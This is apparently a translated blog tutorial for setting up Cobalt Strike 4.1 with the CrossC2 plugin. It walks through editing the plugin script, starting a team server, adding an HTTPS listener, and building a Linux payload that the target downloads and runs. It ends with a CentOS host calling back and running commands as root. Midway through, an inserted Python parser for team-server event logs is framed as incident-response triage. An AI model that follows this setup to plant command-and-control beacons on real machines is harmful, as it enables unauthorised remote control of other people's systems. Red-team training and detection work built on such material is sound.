CobaltStrike 4.1 + CrossC2: installation and getting a Linux host to check in

CS client: Windows 10

Server side: Tencent Cloud server, Ubuntu 20; IP 1.1.1.1 (fake)

Test target: Tencent Cloud server, CentOS 7

Download CrossC2

GitHub - gloxec/CrossC2: generate CobaltStrike's cross-platform payload

Copy the src directory into the Cobalt Strike directory on the Windows 10 client.

Download the plugin binaries:

https://github.com/gloxec/CrossC2/releases/download/v2.2.4/genCrossC2.Linux
https://github.com/gloxec/CrossC2/releases/download/v2.2.4/genCrossC2.Win.zip

Upload the genCrossC2.Linux file to the Cobalt Strike root directory on the Ubuntu server (some articles say it is required, so I put it there up front; it costs nothing).

Then copy the hidden file .cobaltstrike.beacon_keys from the server to the client; use ls -a to see it.

Unzip genCrossC2.Win.zip and copy ucrtbased.dll into C:\Windows\System32.

Edit the CrossC2.cna file under src:

$CC2_PATH = "D:\\Tools\\CobaltStrike4.1\\src\\";  # <-------- fix: change to the absolute path where CrossC2.cna is stored
$CC2_BIN = "genCrossC2.Win.exe";                  # the client is Windows 10, so point this at the Windows binary
sub genCrossC2 {
    $dialog = dialog("CrossC2 Payload Generator", %(uri => "/a", lport => "55413", type => "curl", beaconKey => "./.cobaltstrike.beacon_keys", rebind_lib => "null", listener => "Listener: ", system => "System: ", arch => "Arch: ", payload_type => "Payload_Type: ", outputFileName => "CrossC2-test"), &dialogCallBack);
    # line 212: change the trailing outputFileName => "/tmp/CrossC2-test" to outputFileName => "CrossC2-test"
    # Windows 10 has no /tmp directory, so CS writes the generated payload file directly into the root directory
    # ... the rest of the sub is left unchanged
}

ubuntu@VM-0-9-ubuntu:~/CobaltStrike4.1$ ls -a
.   agscript      c2lint      cobaltstrike       cobaltstrike.bat           CobaltStrikeCN.jar  cobaltstrike.store  genCrossC2.Linux  peclone      teamserver      third-party
..  agscript.bat  c2lint.bat  cobaltstrike.auth  .cobaltstrike.beacon_keys  cobaltstrike.jar    data                logs              peclone.bat  teamserver.bat

Starting Cobalt Strike!!!

Start the team server: chmod +x teamserver   # grant execute permission on the first start

sudo ./teamserver 1.1.1.1 password
[*] Will use existing X509 certificate and keystore (for SSL)
[+] Team server is up on 50050
[*] SHA256 hash of SSL cert is: 57fc0fac31c57fc0fac31c57fc0fac31c57fc0fac31c57fc0fac31c
[!] Web Server will use default SSL certificate (you don't want this).
    Use a valid SSL certificate with Cobalt Strike: https://www.cobaltstrike.com/help-malleable-c2#validssl
[+] Listener: cs4.1 started!

Start the client: double-click cobaltstrike.bat to launch it.

Host is the server address, the port defaults to 50050, the username can be anything, and the password is the password just set.

Top right: Cobalt Strike - Listeners - click Add at the bottom to add a listener. Make it HTTPS, because the CrossC2 listener only supports HTTPS.

Cobalt Strike - Script Manager - Load, and pick CrossC2.cna.

A CrossC2 button now appears at the top of the client.

Click CrossC2 - CrossC2 Payload Generator - genCrossC2 to generate the payload.

On the fourth row choose the file: select the path where .cobaltstrike.beacon_keys is stored, change Listener to the HTTPS listener just added, and click Build.

Copy the command to the target and run it.

The target downloads and executes it automatically.

Check the log: the host has checked in.

08/10 11:58:56 *** new ssh session root *@10.0.4.7 (VM-4-7-centos(23687))

Done
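When reviewing a team server's events log after the fact (a recovered operator box during incident response, or your own engagement logs for reporting), it helps to turn lines like the one above into structured records so that sessions can be sorted and triaged. The following Python is an added example and is not part of the original post, nor of Cobalt Strike or CrossC2; it assumes the "new ssh session" line format shown above, the sample lines are constructed, and reading the "*" after the user name as an elevated-context marker is an assumption of this example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample of a team server events log. The first line is the one
# shown in this post; the other two are made up in the same format.
SAMPLE_EVENTS = """\
08/10 11:58:56 *** new ssh session root *@10.0.4.7 (VM-4-7-centos(23687))
08/10 11:59:10 *** neo joined
08/10 12:01:03 *** new ssh session www-data@10.0.4.9 (web-01(4120))
"""

# Assumption: the "*" between the user name and "@" marks an elevated context
# (root here); the hostname and pid sit in the trailing "(host(pid))" group.
SESSION_RE = re.compile(
    r"^(?P<date>\d{2}/\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"\*\*\* new ssh session "
    r"(?P<user>[^\s@]+)(?P<elev> \*)?@(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"\((?P<host>[^()]+)\((?P<pid>\d+)\)\)$"
)


@dataclass(frozen=True)
class SshSession:
    date: str
    time: str
    user: str
    elevated: bool
    ip: str
    host: str
    pid: int


def parse_session_line(line: str) -> Optional[SshSession]:
    """Return an SshSession for a 'new ssh session' event line, else None."""
    m = SESSION_RE.match(line.strip())
    if m is None:
        return None
    return SshSession(
        date=m["date"],
        time=m["time"],
        user=m["user"],
        elevated=m["elev"] is not None,
        ip=m["ip"],
        host=m["host"],
        pid=int(m["pid"]),
    )


def parse_events(text: str) -> list[SshSession]:
    """Extract every new-session event from an events log; other lines are skipped."""
    return [s for s in map(parse_session_line, text.splitlines()) if s is not None]


def elevated_sessions(sessions: list[SshSession]) -> list[SshSession]:
    """Sessions running as root or otherwise elevated: the ones to triage first."""
    return [s for s in sessions if s.elevated or s.user == "root"]


if __name__ == "__main__":
    for s in parse_events(SAMPLE_EVENTS):
        flag = " (elevated)" if s.elevated else ""
        print(f"{s.date} {s.time} {s.user}@{s.ip} host={s.host} pid={s.pid}{flag}")
```

The parser deliberately ignores lines it does not recognise (operator joins, chat) rather than failing, so it can be pointed at a whole events log; extend SESSION_RE with further event patterns if you need other session types from the same file.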

Enter the beacon

ssh> sleep 0

[*] Tasked beacon to become interactive

[+] host called home, sent: 16 bytes

ssh> shell id

[*] Tasked session to run: id

[+] host called home, sent: 11 bytes

[+] received output:

uid=0(root) gid=0(root) 组=0(root)
